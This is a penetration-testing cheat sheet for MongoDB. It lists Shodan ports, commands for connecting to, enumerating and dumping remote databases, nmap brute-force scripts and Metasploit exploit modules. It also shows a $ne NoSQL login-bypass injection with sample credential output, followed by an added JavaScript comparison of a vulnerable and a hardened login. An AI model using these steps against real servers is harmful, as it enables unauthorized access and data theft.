- Shodan :
- Mongodb
- port : 27017 , 28017
- 6379
- couchdb , 5984
- Tools Automated Assessments (Nosqlmap):
- http://github.com/tcstool/nosqlmap
- How to attack :
- https://github.com/all3g/exploit-exercises/blob/master/mongodb/mongodb_hacking.md
- install :
- apt-get install mongodb-clients
- $ echo 'deb http://downloads-distro.mongodb.org/repo/debian-sysvinit dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list
- $ sudo apt-get update
- $ sudo apt-get install mongodb-org
- $ apt-get install mongodb-org=2.6.0 mongodb-org-server=2.6.0 mongodb-org-shell=2.6.0 mongodb-org-mongos=2.6.0 mongodb-org-tools=2.6.0
- # sudo service mongod start
- # sudo service mongod stop
- How to :
- Connect to DB:
- mongo --port <port> -u <username> -p <password> <IP>
- Note: Port 27017 is default value
- ex: mongo -u foo -p bar 10.10.10.10
- Show server info:
- db.adminCommand( { "hostInfo" : 1 } )
- ex: db.adminCommand( { "hostInfo" : 1 } )
- {
- "system" : {
- "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
- "hostname" : "AwesomePC",
- "cpuAddrSize" : 64,
- "memSizeMB" : 1002,
- "numCores" : 2,
- "cpuArch" : "x86_64",
- "numaEnabled" : false
- },
- "os" : {
- "type" : "Linux",
- "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
- "version" : "Kernel 3.2.0-4-amd64"
- },
- "extra" : {
- "versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
- "libcVersion" : "2.13",
- "kernelVersion" : "3.2.0-4-amd64",
- "cpuFrequencyMHz" : "2266.747",
- },
- "ok" : 1
- }
- >
- Show users:
- show users
- -or-
- db.runCommand( { usersInfo: 1 } )
- ex: show users
- Show roles:
- show roles
- ex: show roles
- Show databases:
- show dbs
- ex: show dbs
- SecretDB (size of DB)
- AwesomeDB (size of DB)
- EmptyDB (empty)
- Use database:
- use <db_name>
- ex: use SecretDB
- Show tables (called collections):
- show tables
- -or-
- show collections
- -or-
- db.getCollectionNames()
- ex: show tables
- fluffy
- users
- List data in the table/collection:
- db.<table_name>.find()
- ex: db.users.find()
- Note: by default, it will only display one page
- Can also set limit with:
- db.<table_name>.find().limit(#)
- ex: db.users.find().limit(5)
- Search for exact match in the table/collection:
- db.<collection_name>.find( { <column_name> : "<value>" } )
- ex: db.users.find( { name : "Tony" } )
- Wildcard search data in the table/collection:
- db.<collection_name>.find( { <column_name> : /<value>/i } )
- Note: the i after the closing / makes the search case-insensitive
- ex: db.users.find( { name : /tony/i } )
- Dump the DB for off-line grepping:
- mongodump -u <user> -p <pass> -h <IP> --db <db_name>
- ex: mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB
- Note: Results are dumped to: dump/<db_name>/<collection_name>.bson
- Logout:
- logout
- CAVEATS:
- The cat command reads your own files, not the remote system's files
- ex: cat ("/etc/shadow") is your own shadow file :( Bummer, I know!
- find : db.users.find( { "email" : "xxx@xxx.com" } )
- insert Data :
- db.table.insert({name: "xxx", lnam: "alalala"})
- Wiki :
- http://www.mongodbspain.com/wp-content/uploads/2014/03/MongoDBSpain-CheetSheet.pdf
- ========================================================================
- # Vulnerability Assessment
- nmap -p 27017 <ipaddress>
- nmap -p 27017 -sV <ipaddress>
- nmap -p 27017 --script mongodb-brute <ipaddress>
- nmap -p 27017 --script mongodb-databases <ipaddress>
- msf > use auxiliary/scanner/mongodb/mongodb_login
- msf > use auxiliary/gather/mongodb_js_inject_collection_enum
- msf > use exploit/linux/misc/mongod_native_helper
- nmap -p 28017 <ipaddress>
- nmap -p 28017 -sV <ipaddress>
- http://<ipaddress>:28017/
- ========================================================================
- # Attacking Applications
- > db.users.find({"username":"jim", "password": {$ne: "0x00"}})
- { "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
- Note that the above MongoDB query fetches every document whose username is "jim" and whose password is not equal to "0x00"; since no password is "0x00", the $ne clause is always true and the password check is bypassed.
- > db.users.find({"username": {$ne: "0x00"}, "password": {$ne: "0x00"}})
- { "_id" : ObjectId("55d5d6f2d60515e316247246"), "username" : "tom", "password" : "tom", "email" : "tom@gmail.com", "cardnumber" : 12345 }
- { "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
- { "_id" : ObjectId("55d5d739d60515e316247248"), "username" : "bob", "password" : "bob", "email" : "bob@gmail.com", "cardnumber" : 22222 }
- This time every document is returned: no username or password equals "0x00", so both $ne conditions match every record in the collection.
- http://localhost/index.php?username[$ne]=test&password[$ne]=test
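The injection above works because a query-string parser turns username[$ne]=test into an object, and the application passes that object straight into the filter. The following is an added example (not code from the original paste or from the application it targets) that models the two filter shapes discussed with a tiny in-memory $ne matcher, places the vulnerable login beside a hardened one that insists on plain string parameters, and uses constructed sample documents mirroring the three users shown above.

```javascript
// Constructed sample documents, mirroring the three users in the paste.
const users = [
  { username: "tom", password: "tom", cardnumber: 12345 },
  { username: "jim", password: "jim", cardnumber: 54321 },
  { username: "bob", password: "bob", cardnumber: 22222 },
];

// Minimal matcher supporting only equality and $ne: just enough to model how
// db.users.find() evaluates the two filters discussed above.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      if ("$ne" in cond) return doc[field] !== cond.$ne;
      throw new Error(`unsupported operator in filter for ${field}`);
    }
    return doc[field] === cond;
  });
}

// Vulnerable pattern: parsed request parameters are used as-is, so
// ?username[$ne]=test&password[$ne]=test arrives as {username: {$ne: "test"}, ...}
// and the value becomes an operator instead of a literal string.
function loginVulnerable(params) {
  const filter = { username: params.username, password: params.password };
  return users.filter((u) => matches(u, filter));
}

// Hardened pattern: both parameters must be plain strings before they reach
// the filter, so an object decoded from name[$ne]=... is rejected outright.
// (The password comparison itself is kept as in the paste; the point here is
// the operator injection, not how credentials are stored.)
function loginHardened(params) {
  if (typeof params.username !== "string" || typeof params.password !== "string") {
    throw new TypeError("username and password must be plain strings");
  }
  const filter = { username: params.username, password: params.password };
  return users.filter((u) => matches(u, filter));
}

// Constructed parameter sets: what a PHP-style parser decodes from the injected
// request in the paste, and a legitimate login for comparison.
const injected = { username: { $ne: "test" }, password: { $ne: "test" } };
const legit = { username: "jim", password: "jim" };

console.log("vulnerable, injected:", loginVulnerable(injected).length, "documents");
console.log("vulnerable, legit:", loginVulnerable(legit).length, "document");
```

The vulnerable function returns all three documents for the injected parameters, while the hardened function throws before any query is built.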